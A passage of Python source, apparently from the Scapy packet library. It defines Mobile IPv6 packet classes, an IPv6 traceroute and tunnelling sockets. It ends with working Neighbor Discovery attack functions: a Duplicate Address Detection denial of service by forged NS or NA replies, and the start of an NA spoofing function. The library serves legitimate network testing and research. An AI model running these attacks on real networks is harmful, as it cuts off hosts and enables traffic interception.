Data' 2677 fields_desc = [ ByteEnumField('otype', 5, _mobopttypes), 2678 ByteField('olen', 16), 2679 BitField('authenticator', 0, 96) ] 2680 x = 8 ; y = 2 # alignment requirement: 8n+2 2681 2682class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963 2683 name = 'NEMO Option - Mobile Network Prefix' 2684 fields_desc = [ ByteEnumField("otype", 6, _mobopttypes), 2685 ByteField("olen", 18), 2686 ByteField("reserved", 0), 2687 ByteField("plen", 64), 2688 IP6Field("prefix", "::") ] 2689 x = 8 ; y = 4 # alignment requirement: 8n+4 2690 2691class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068 2692 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" 2693 fields_desc = [ ByteEnumField("otype", 7, _mobopttypes), 2694 ByteField("olen", 7), 2695 ByteEnumField("ocode", 2, _rfc4068_lla_optcode), 2696 ByteField("pad", 0), 2697 MACField("lla", ETHER_ANY) ] # Only support ethernet 2698 x = 0 ; y = 0 # alignment requirement: none 2699 2700class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283 2701 name = "MIPv6 Option - Mobile Node Identifier" 2702 fields_desc = [ ByteEnumField("otype", 8, _mobopttypes), 2703 FieldLenField("olen", None, length_of="id", fmt="B", 2704 adjust = lambda pkt,x: x+1), 2705 ByteEnumField("subtype", 1, {1: "NAI"}), 2706 StrLenField("id", "", 2707 length_from = lambda pkt: pkt.olen-1) ] 2708 x = 0 ; y = 0 # alignment requirement: none 2709 2710# We only support decoding and basic build. Automatic HMAC computation is 2711# too much work for our current needs. It is left to the user (I mean ... 2712# you). --arno 2713class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5) 2714 name = "MIPv6 Option - Mobility Message Authentication" 2715 fields_desc = [ ByteEnumField("otype", 9, _mobopttypes), 2716 FieldLenField("olen", None, length_of="authdata", fmt="B", 2717 adjust = lambda pkt,x: x+5), 2718 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", 2719 2: "MN-AAA authentication mobility option"}), 2720 IntField("mspi", None), 2721 StrLenField("authdata", "A"*12, 2722 length_from = lambda pkt: pkt.olen-5) ] 2723 x = 4 ; y = 1 # alignment requirement: 4n+1 2724 2725# Extracted from RFC 1305 (NTP) : 2726# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 2727# in seconds relative to 0h on 1 January 1900. The integer part is in the 2728# first 32 bits and the fraction part in the last 32 bits. 2729class NTPTimestampField(LongField): 2730 def i2repr(self, pkt, x): 2731 if x < ((50*31536000)<<32): 2732 return "Some date a few decades ago (%d)" % x 2733 2734 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to 2735 # January 1st 1970 : 2736 delta = -2209075761 2737 i = int(x >> 32) 2738 j = float(x & 0xffffffff) * 2.0**-32 2739 res = i + j + delta 2740 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) 2741 2742 return "%s (%d)" % (t, x) 2743 2744class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6) 2745 name = "MIPv6 option - Replay Protection" 2746 fields_desc = [ ByteEnumField("otype", 10, _mobopttypes), 2747 ByteField("olen", 8), 2748 NTPTimestampField("timestamp", 0) ] 2749 x = 8 ; y = 2 # alignment requirement: 8n+2 2750 2751class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6) 2752 name = "MIPv6 option - CGA Parameters Request" 2753 fields_desc = [ ByteEnumField("otype", 11, _mobopttypes), 2754 ByteField("olen", 0) ] 2755 x = 0 ; y = 0 # alignment requirement: none 2756 2757# XXX TODO: deal with CGA param fragmentation and build of defragmented 2758# XXX version. Passing of a big CGAParam structure should be 2759# XXX simplified. Make it hold packets, by the way --arno 2760class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1) 2761 name = "MIPv6 option - CGA Parameters" 2762 fields_desc = [ ByteEnumField("otype", 12, _mobopttypes), 2763 FieldLenField("olen", None, length_of="cgaparams", fmt="B"), 2764 StrLenField("cgaparams", "", 2765 length_from = lambda pkt: pkt.olen) ] 2766 x = 0 ; y = 0 # alignment requirement: none 2767 2768class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2) 2769 name = "MIPv6 option - Signature" 2770 fields_desc = [ ByteEnumField("otype", 13, _mobopttypes), 2771 FieldLenField("olen", None, length_of="sig", fmt="B"), 2772 StrLenField("sig", "", 2773 length_from = lambda pkt: pkt.olen) ] 2774 x = 0 ; y = 0 # alignment requirement: none 2775 2776class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3) 2777 name = "MIPv6 option - Home Keygen Token" 2778 fields_desc = [ ByteEnumField("otype", 14, _mobopttypes), 2779 FieldLenField("olen", None, length_of="hkt", fmt="B"), 2780 StrLenField("hkt", "", 2781 length_from = lambda pkt: pkt.olen) ] 2782 x = 0 ; y = 0 # alignment requirement: none 2783 2784class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4) 2785 name = "MIPv6 option - Care-of Test Init" 2786 fields_desc = [ ByteEnumField("otype", 15, _mobopttypes), 2787 ByteField("olen", 0) ] 2788 x = 0 ; y = 0 # alignment requirement: none 2789 2790class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5) 2791 name = "MIPv6 option - Care-of Test" 2792 fields_desc = [ ByteEnumField("otype", 16, _mobopttypes), 2793 FieldLenField("olen", None, length_of="cokt", fmt="B"), 2794 StrLenField("cokt", b'\x00'*8, 2795 length_from = lambda pkt: pkt.olen) ] 2796 x = 0 ; y = 0 # alignment requirement: none 2797 2798class MIP6OptUnknown(_MIP6OptAlign, Packet): 2799 name = 'Scapy6 - Unknown Mobility Option' 2800 fields_desc = [ ByteEnumField("otype", 6, _mobopttypes), 2801 FieldLenField("olen", None, length_of="odata", fmt="B"), 2802 StrLenField("odata", "", 2803 length_from = lambda pkt: pkt.olen) ] 2804 x = 0 ; y = 0 # alignment requirement: none 2805 2806moboptcls = { 0: Pad1, 2807 1: PadN, 2808 2: MIP6OptBRAdvice, 2809 3: MIP6OptAltCoA, 2810 4: MIP6OptNonceIndices, 2811 5: MIP6OptBindingAuthData, 2812 6: MIP6OptMobNetPrefix, 2813 7: MIP6OptLLAddr, 2814 8: MIP6OptMNID, 2815 9: MIP6OptMsgAuth, 2816 10: MIP6OptReplayProtection, 2817 11: MIP6OptCGAParamsReq, 2818 12: MIP6OptCGAParams, 2819 13: MIP6OptSignature, 2820 14: MIP6OptHomeKeygenToken, 2821 15: MIP6OptCareOfTestInit, 2822 16: MIP6OptCareOfTest } 2823 2824 2825# Main Mobile IPv6 Classes 2826 2827mhtypes = { 0: 'BRR', 2828 1: 'HoTI', 2829 2: 'CoTI', 2830 3: 'HoT', 2831 4: 'CoT', 2832 5: 'BU', 2833 6: 'BA', 2834 7: 'BE', 2835 8: 'Fast BU', 2836 9: 'Fast BA', 2837 10: 'Fast NA' } 2838 2839# From http://www.iana.org/assignments/mobility-parameters 2840bastatus = { 0: 'Binding Update accepted', 2841 1: 'Accepted but prefix discovery necessary', 2842 128: 'Reason unspecified', 2843 129: 'Administratively prohibited', 2844 130: 'Insufficient resources', 2845 131: 'Home registration not supported', 2846 132: 'Not home subnet', 2847 133: 'Not home agent for this mobile node', 2848 134: 'Duplicate Address Detection failed', 2849 135: 'Sequence number out of window', 2850 136: 'Expired home nonce index', 2851 137: 'Expired care-of nonce index', 2852 138: 'Expired nonces', 2853 139: 'Registration type change disallowed', 2854 140: 'Mobile Router Operation not permitted', 2855 141: 'Invalid Prefix', 2856 142: 'Not Authorized for Prefix', 2857 143: 'Forwarding Setup failed (prefixes missing)', 2858 144: 'MIPV6-ID-MISMATCH', 2859 145: 'MIPV6-MESG-ID-REQD', 2860 146: 'MIPV6-AUTH-FAIL', 2861 147: 'Permanent home keygen token unavailable', 2862 148: 'CGA and signature verification failed', 2863 149: 'Permanent home keygen token exists', 2864 150: 'Non-null home nonce index expected' } 2865 2866 2867class _MobilityHeader(Packet): 2868 name = 'Dummy IPv6 Mobility Header' 2869 overload_fields = { IPv6: { "nh": 135 }} 2870 2871 def post_build(self, p, pay): 2872 p += pay 2873 l = self.len 2874 if self.len is None: 2875 l = (len(p)-8)//8 2876 p = chb(p[0]) + struct.pack("B", l) + chb(p[2:]) 2877 if self.cksum is None: 2878 cksum = in6_chksum(135, self.underlayer, p) 2879 else: 2880 cksum = self.cksum 2881 p = chb(p[:4])+struct.pack("!H", cksum)+chb(p[6:]) 2882 return p 2883 2884 2885class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg 2886 name = "IPv6 Mobility Header - Generic Message" 2887 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 2888 ByteField("len", None), 2889 ByteEnumField("mhtype", None, mhtypes), 2890 ByteField("res", None), 2891 XShortField("cksum", None), 2892 StrLenField("msg", b"\x00"*2, 2893 length_from = lambda pkt: 8*pkt.len-6) ] 2894 2895 2896 2897# TODO: make a generic _OptionsField 2898class _MobilityOptionsField(PacketListField): 2899 __slots__ = ["curpos"] 2900 def __init__(self, name, default, cls, curpos, count_from=None, length_from=None): 2901 self.curpos = curpos 2902 PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from) 2903 2904 def getfield(self, pkt, s): 2905 l = self.length_from(pkt) 2906 return s[l:],self.m2i(pkt, s[:l]) 2907 2908 def i2len(self, pkt, i): 2909 return len(self.i2m(pkt, i)) 2910 2911 def m2i(self, pkt, x): 2912 opt = [] 2913 while x: 2914 o = orb(x[0]) # Option type 2915 cls = self.cls 2916 if o in moboptcls: 2917 cls = moboptcls[o] 2918 try: 2919 op = cls(x) 2920 except: 2921 op = self.cls(x) 2922 opt.append(op) 2923 if isinstance(op.payload, conf.raw_layer): 2924 x = op.payload.load 2925 del(op.payload) 2926 else: 2927 x = b"" 2928 return opt 2929 2930 def i2m(self, pkt, x): 2931 autopad = None 2932 try: 2933 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field 2934 except: 2935 autopad = 1 2936 2937 if not autopad: 2938 return b"".join(map(str, x)) 2939 2940 curpos = self.curpos 2941 s = b"" 2942 for p in x: 2943 d = p.alignment_delta(curpos) 2944 curpos += d 2945 if d == 1: 2946 s += raw(Pad1()) 2947 elif d != 0: 2948 s += raw(PadN(optdata=b'\x00'*(d-2))) 2949 pstr = raw(p) 2950 curpos += len(pstr) 2951 s += pstr 2952 2953 # Let's make the class including our option field 2954 # a multiple of 8 octets long 2955 d = curpos % 8 2956 if d == 0: 2957 return s 2958 d = 8 - d 2959 if d == 1: 2960 s += raw(Pad1()) 2961 elif d != 0: 2962 s += raw(PadN(optdata=b'\x00'*(d-2))) 2963 2964 return s 2965 2966 def addfield(self, pkt, s, val): 2967 return s+self.i2m(pkt, val) 2968 2969class MIP6MH_BRR(_MobilityHeader): 2970 name = "IPv6 Mobility Header - Binding Refresh Request" 2971 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 2972 ByteField("len", None), 2973 ByteEnumField("mhtype", 0, mhtypes), 2974 ByteField("res", None), 2975 XShortField("cksum", None), 2976 ShortField("res2", None), 2977 _PhantomAutoPadField("autopad", 1), # autopad activated by default 2978 _MobilityOptionsField("options", [], MIP6OptUnknown, 8, 2979 length_from = lambda pkt: 8*pkt.len) ] 2980 overload_fields = { IPv6: { "nh": 135 } } 2981 def hashret(self): 2982 # Hack: BRR, BU and BA have the same hashret that returns the same 2983 # value b"\x00\x08\x09" (concatenation of mhtypes). This is 2984 # because we need match BA with BU and BU with BRR. --arno 2985 return b"\x00\x08\x09" 2986 2987class MIP6MH_HoTI(_MobilityHeader): 2988 name = "IPv6 Mobility Header - Home Test Init" 2989 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 2990 ByteField("len", None), 2991 ByteEnumField("mhtype", 1, mhtypes), 2992 ByteField("res", None), 2993 XShortField("cksum", None), 2994 StrFixedLenField("reserved", b"\x00"*2, 2), 2995 StrFixedLenField("cookie", b"\x00"*8, 8), 2996 _PhantomAutoPadField("autopad", 1), # autopad activated by default 2997 _MobilityOptionsField("options", [], MIP6OptUnknown, 16, 2998 length_from = lambda pkt: 8*(pkt.len-1)) ] 2999 overload_fields = { IPv6: { "nh": 135 } } 3000 def hashret(self): 3001 return raw(self.cookie) 3002 3003class MIP6MH_CoTI(MIP6MH_HoTI): 3004 name = "IPv6 Mobility Header - Care-of Test Init" 3005 mhtype = 2 3006 def hashret(self): 3007 return raw(self.cookie) 3008 3009class MIP6MH_HoT(_MobilityHeader): 3010 name = "IPv6 Mobility Header - Home Test" 3011 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 3012 ByteField("len", None), 3013 ByteEnumField("mhtype", 3, mhtypes), 3014 ByteField("res", None), 3015 XShortField("cksum", None), 3016 ShortField("index", None), 3017 StrFixedLenField("cookie", b"\x00"*8, 8), 3018 StrFixedLenField("token", b"\x00"*8, 8), 3019 _PhantomAutoPadField("autopad", 1), # autopad activated by default 3020 _MobilityOptionsField("options", [], MIP6OptUnknown, 24, 3021 length_from = lambda pkt: 8*(pkt.len-2)) ] 3022 overload_fields = { IPv6: { "nh": 135 } } 3023 def hashret(self): 3024 return raw(self.cookie) 3025 def answers(self, other): 3026 if (isinstance(other, MIP6MH_HoTI) and 3027 self.cookie == other.cookie): 3028 return 1 3029 return 0 3030 3031class MIP6MH_CoT(MIP6MH_HoT): 3032 name = "IPv6 Mobility Header - Care-of Test" 3033 mhtype = 4 3034 def hashret(self): 3035 return raw(self.cookie) 3036 3037 def answers(self, other): 3038 if (isinstance(other, MIP6MH_CoTI) and 3039 self.cookie == other.cookie): 3040 return 1 3041 return 0 3042 3043class LifetimeField(ShortField): 3044 def i2repr(self, pkt, x): 3045 return "%d sec" % (4*x) 3046 3047class MIP6MH_BU(_MobilityHeader): 3048 name = "IPv6 Mobility Header - Binding Update" 3049 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 3050 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) 3051 ByteEnumField("mhtype", 5, mhtypes), 3052 ByteField("res", None), 3053 XShortField("cksum", None), 3054 XShortField("seq", None), # TODO: ShortNonceField 3055 FlagsField("flags", "KHA", 7, "PRMKLHA"), 3056 XBitField("reserved", 0, 9), 3057 LifetimeField("mhtime", 3), # unit == 4 seconds 3058 _PhantomAutoPadField("autopad", 1), # autopad activated by default 3059 _MobilityOptionsField("options", [], MIP6OptUnknown, 12, 3060 length_from = lambda pkt: 8*pkt.len - 4) ] 3061 overload_fields = { IPv6: { "nh": 135 } } 3062 3063 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3064 return b"\x00\x08\x09" 3065 3066 def answers(self, other): 3067 if isinstance(other, MIP6MH_BRR): 3068 return 1 3069 return 0 3070 3071class MIP6MH_BA(_MobilityHeader): 3072 name = "IPv6 Mobility Header - Binding ACK" 3073 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 3074 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) 3075 ByteEnumField("mhtype", 6, mhtypes), 3076 ByteField("res", None), 3077 XShortField("cksum", None), 3078 ByteEnumField("status", 0, bastatus), 3079 FlagsField("flags", "K", 3, "PRK"), 3080 XBitField("res2", None, 5), 3081 XShortField("seq", None), # TODO: ShortNonceField 3082 XShortField("mhtime", 0), # unit == 4 seconds 3083 _PhantomAutoPadField("autopad", 1), # autopad activated by default 3084 _MobilityOptionsField("options", [], MIP6OptUnknown, 12, 3085 length_from = lambda pkt: 8*pkt.len-4) ] 3086 overload_fields = { IPv6: { "nh": 135 }} 3087 3088 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3089 return b"\x00\x08\x09" 3090 3091 def answers(self, other): 3092 if (isinstance(other, MIP6MH_BU) and 3093 other.mhtype == 5 and 3094 self.mhtype == 6 and 3095 other.flags & 0x1 and # Ack request flags is set 3096 self.seq == other.seq): 3097 return 1 3098 return 0 3099 3100_bestatus = { 1: 'Unknown binding for Home Address destination option', 3101 2: 'Unrecognized MH Type value' } 3102 3103# TODO: match Binding Error to its stimulus 3104class MIP6MH_BE(_MobilityHeader): 3105 name = "IPv6 Mobility Header - Binding Error" 3106 fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 3107 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) 3108 ByteEnumField("mhtype", 7, mhtypes), 3109 ByteField("res", 0), 3110 XShortField("cksum", None), 3111 ByteEnumField("status", 0, _bestatus), 3112 ByteField("reserved", 0), 3113 IP6Field("ha", "::"), 3114 _MobilityOptionsField("options", [], MIP6OptUnknown, 24, 3115 length_from = lambda pkt: 8*(pkt.len-2)) ] 3116 overload_fields = { IPv6: { "nh": 135 }} 3117 3118_mip6_mhtype2cls = { 0: MIP6MH_BRR, 3119 1: MIP6MH_HoTI, 3120 2: MIP6MH_CoTI, 3121 3: MIP6MH_HoT, 3122 4: MIP6MH_CoT, 3123 5: MIP6MH_BU, 3124 6: MIP6MH_BA, 3125 7: MIP6MH_BE } 3126 3127 3128 3129############################################################################# 3130############################################################################# 3131### Traceroute6 ### 3132############################################################################# 3133############################################################################# 3134 3135class AS_resolver6(AS_resolver_riswhois): 3136 def _resolve_one(self, ip): 3137 """ 3138 overloaded version to provide a Whois resolution on the 3139 embedded IPv4 address if the address is 6to4 or Teredo. 3140 Otherwise, the native IPv6 address is passed. 3141 """ 3142 3143 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 3144 tmp = inet_pton(socket.AF_INET6, ip) 3145 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 3146 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 3147 addr = teredoAddrExtractInfo(ip)[2] 3148 else: 3149 addr = ip 3150 3151 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 3152 3153 if asn.startswith("AS"): 3154 try: 3155 asn = int(asn[2:]) 3156 except ValueError: 3157 pass 3158 3159 return ip,asn,desc 3160 3161class TracerouteResult6(TracerouteResult): 3162 __slots__ = [] 3163 def show(self): 3164 return self.make_table(lambda s_r: (s_r[0].sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! 3165 s_r[0].hlim, 3166 s_r[1].sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+ 3167 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+ 3168 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+ 3169 "{ICMPv6EchoReply:%ir,type%}"))) 3170 3171 def get_trace(self): 3172 trace = {} 3173 3174 for s,r in self.res: 3175 if IPv6 not in s: 3176 continue 3177 d = s[IPv6].dst 3178 if d not in trace: 3179 trace[d] = {} 3180 3181 t = not (ICMPv6TimeExceeded in r or 3182 ICMPv6DestUnreach in r or 3183 ICMPv6PacketTooBig in r or 3184 ICMPv6ParamProblem in r) 3185 3186 trace[d][s[IPv6].hlim] = r[IPv6].src, t 3187 3188 for k in six.itervalues(trace): 3189 try: 3190 m = min(x for x, y in six.itervalues(k) if y) 3191 except ValueError: 3192 continue 3193 for l in list(k): # use list(): k is modified in the loop 3194 if l > m: 3195 del k[l] 3196 3197 return trace 3198 3199 def graph(self, ASres=AS_resolver6(), **kargs): 3200 TracerouteResult.graph(self, ASres=ASres, **kargs) 3201 3202@conf.commands.register 3203def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 3204 l4 = None, timeout=2, verbose=None, **kargs): 3205 """Instant TCP traceroute using IPv6 3206 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None 3207 """ 3208 if verbose is None: 3209 verbose = conf.verb 3210 3211 if l4 is None: 3212 a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport), 3213 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) 3214 else: 3215 a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4, 3216 timeout=timeout, verbose=verbose, **kargs) 3217 3218 a = TracerouteResult6(a.res) 3219 3220 if verbose: 3221 a.display() 3222 3223 return a,b 3224 3225############################################################################# 3226############################################################################# 3227### Sockets ### 3228############################################################################# 3229############################################################################# 3230 3231class L3RawSocket6(L3RawSocket): 3232 def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): 3233 L3RawSocket.__init__(self, type, filter, iface, promisc) 3234 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) 3235 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) 3236 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) 3237 3238def IPv6inIP(dst='203.178.135.36', src=None): 3239 _IPv6inIP.dst = dst 3240 _IPv6inIP.src = src 3241 if not conf.L3socket == _IPv6inIP: 3242 _IPv6inIP.cls = conf.L3socket 3243 else: 3244 del(conf.L3socket) 3245 return _IPv6inIP 3246 3247class _IPv6inIP(SuperSocket): 3248 dst = '127.0.0.1' 3249 src = None 3250 cls = None 3251 3252 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): 3253 SuperSocket.__init__(self, family, type, proto) 3254 self.worker = self.cls(**args) 3255 3256 def set(self, dst, src=None): 3257 _IPv6inIP.src = src 3258 _IPv6inIP.dst = dst 3259 3260 def nonblock_recv(self): 3261 p = self.worker.nonblock_recv() 3262 return self._recv(p) 3263 3264 def recv(self, x): 3265 p = self.worker.recv(x) 3266 return self._recv(p, x) 3267 3268 def _recv(self, p, x=MTU): 3269 if p is None: 3270 return p 3271 elif isinstance(p, IP): 3272 # TODO: verify checksum 3273 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 3274 if isinstance(p.payload, IPv6): 3275 return p.payload 3276 return p 3277 3278 def send(self, x): 3279 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x) 3280 3281 3282############################################################################# 3283############################################################################# 3284### Neighbor Discovery Protocol Attacks ### 3285############################################################################# 3286############################################################################# 3287 3288def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 3289 tgt_filter=None, reply_mac=None): 3290 """ 3291 Internal generic helper accepting a specific callback as first argument, 3292 for NS or NA reply. See the two specific functions below. 3293 """ 3294 3295 def is_request(req, mac_src_filter, tgt_filter): 3296 """ 3297 Check if packet req is a request 3298 """ 3299 3300 # Those simple checks are based on Section 5.4.2 of RFC 4862 3301 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3302 return 0 3303 3304 # Get and compare the MAC address 3305 mac_src = req[Ether].src 3306 if mac_src_filter and mac_src != mac_src_filter: 3307 return 0 3308 3309 # Source must be the unspecified address 3310 if req[IPv6].src != "::": 3311 return 0 3312 3313 # Check destination is the link-local solicited-node multicast 3314 # address associated with target address in received NS 3315 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3316 if tgt_filter and tgt != tgt_filter: 3317 return 0 3318 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 3319 expected_snma = in6_getnsma(tgt) 3320 if received_snma != expected_snma: 3321 return 0 3322 3323 return 1 3324 3325 if not iface: 3326 iface = conf.iface 3327 3328 # To prevent sniffing our own traffic 3329 if not reply_mac: 3330 reply_mac = get_if_hwaddr(iface) 3331 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3332 3333 sniff(store=0, 3334 filter=sniff_filter, 3335 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3336 prn=lambda x: reply_callback(x, reply_mac, iface), 3337 iface=iface) 3338 3339 3340def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 3341 reply_mac=None): 3342 """ 3343 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3344 3756. This is done by listening incoming NS messages sent from the 3345 unspecified address and sending a NS reply for the target address, 3346 leading the peer to believe that another node is also performing DAD 3347 for that address. 3348 3349 By default, the fake NS sent to create the DoS uses: 3350 - as target address the target address found in received NS. 3351 - as IPv6 source address: the unspecified address (::). 3352 - as IPv6 destination address: the link-local solicited-node multicast 3353 address derived from the target address in received NS. 3354 - the mac address of the interface as source (or reply_mac, see below). 3355 - the multicast mac address derived from the solicited node multicast 3356 address used as IPv6 destination address. 3357 3358 Following arguments can be used to change the behavior: 3359 3360 iface: a specific interface (e.g. "eth0") of the system on which the 3361 DoS should be launched. If None is provided conf.iface is used. 3362 3363 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3364 Only NS messages received from this source will trigger replies. 3365 This allows limiting the effects of the DoS to a single target by 3366 filtering on its mac address. The default value is None: the DoS 3367 is not limited to a specific mac address. 3368 3369 tgt_filter: Same as previous but for a specific target IPv6 address for 3370 received NS. If the target address in the NS message (not the IPv6 3371 destination address) matches that address, then a fake reply will 3372 be sent, i.e. the emitter will be a target of the DoS. 3373 3374 reply_mac: allow specifying a specific source mac address for the reply, 3375 i.e. to prevent the use of the mac address of the interface. 3376 """ 3377 3378 def ns_reply_callback(req, reply_mac, iface): 3379 """ 3380 Callback that reply to a NS by sending a similar NS 3381 """ 3382 3383 # Let's build a reply and send it 3384 mac = req[Ether].src 3385 dst = req[IPv6].dst 3386 tgt = req[ICMPv6ND_NS].tgt 3387 rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt) 3388 sendp(rep, iface=iface, verbose=0) 3389 3390 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 3391 3392 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 3393 tgt_filter, reply_mac) 3394 3395 3396def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 3397 reply_mac=None): 3398 """ 3399 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3400 3756. This is done by listening incoming NS messages *sent from the 3401 unspecified address* and sending a NA reply for the target address, 3402 leading the peer to believe that another node is also performing DAD 3403 for that address. 3404 3405 By default, the fake NA sent to create the DoS uses: 3406 - as target address the target address found in received NS. 3407 - as IPv6 source address: the target address found in received NS. 3408 - as IPv6 destination address: the link-local solicited-node multicast 3409 address derived from the target address in received NS. 3410 - the mac address of the interface as source (or reply_mac, see below). 3411 - the multicast mac address derived from the solicited node multicast 3412 address used as IPv6 destination address. 3413 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 3414 with the mac address used as source of the NA. 3415 3416 Following arguments can be used to change the behavior: 3417 3418 iface: a specific interface (e.g. "eth0") of the system on which the 3419 DoS should be launched. If None is provided conf.iface is used. 3420 3421 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3422 Only NS messages received from this source will trigger replies. 3423 This allows limiting the effects of the DoS to a single target by 3424 filtering on its mac address. The default value is None: the DoS 3425 is not limited to a specific mac address. 3426 3427 tgt_filter: Same as previous but for a specific target IPv6 address for 3428 received NS. If the target address in the NS message (not the IPv6 3429 destination address) matches that address, then a fake reply will 3430 be sent, i.e. the emitter will be a target of the DoS. 3431 3432 reply_mac: allow specifying a specific source mac address for the reply, 3433 i.e. to prevent the use of the mac address of the interface. This 3434 address will also be used in the Target Link-Layer Address option. 3435 """ 3436 3437 def na_reply_callback(req, reply_mac, iface): 3438 """ 3439 Callback that reply to a NS with a NA 3440 """ 3441 3442 # Let's build a reply and send it 3443 mac = req[Ether].src 3444 dst = req[IPv6].dst 3445 tgt = req[ICMPv6ND_NS].tgt 3446 rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst) 3447 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) 3448 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3449 sendp(rep, iface=iface, verbose=0) 3450 3451 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3452 3453 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 3454 tgt_filter, reply_mac) 3455 3456 3457def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 3458 reply_mac=None, router=False): 3459 """ 3460 The main purpose of this function is to send fake Neighbor Advertisement 3461 messages to a victim. As the emission of unsolicited Neighbor Advertisement 3462 is pretty pointless (from an attacker standpoint) because it will not 3463 lead to a modification of a victim's neighbor cache, the function send 3464 advertisements in response to received NS (NS sent as part of the DAD, 3465 i.e. with an unspecified address as source, are not considered). 3466 3467 By default, the fake NA sent to create the DoS uses: 3468 - as target address the target address found in received NS. 3469 - as IPv6 source address: the target address 3470 - as IPv6 destination address: the source IPv6 address of received NS 3471 message. 3472 - the mac address of the interface as source (or reply_mac, see below). 3473 - the source mac address of the received NS as destination macs address 3474 of the emitted NA. 3475 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 3476 filled with the mac address used as source of the NA. 3477 3478 Following arguments can be used to change the behavior: 3479 3480 iface: a specific interface (e.g. "eth0") of the system on which the 3481 DoS should be launched. If None is provided conf.iface is used. 3482 3483 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3484 Only NS messages received from this source will trigger replies. 3485 This allows limiting the effects of the DoS to a single target by 3486 filtering on its mac address. The default value is None: the DoS 3487 is not limited to a specific mac address. 3488 3489 tgt_filter: Same as previous but for a specific target IPv6 address for 3490 received NS. If the target address in the NS message (not the IPv6 3491 destination address) matches that address, then a fake reply will 3492 be sent, i.e. the emitter will be a target of the DoS. 3493 3494 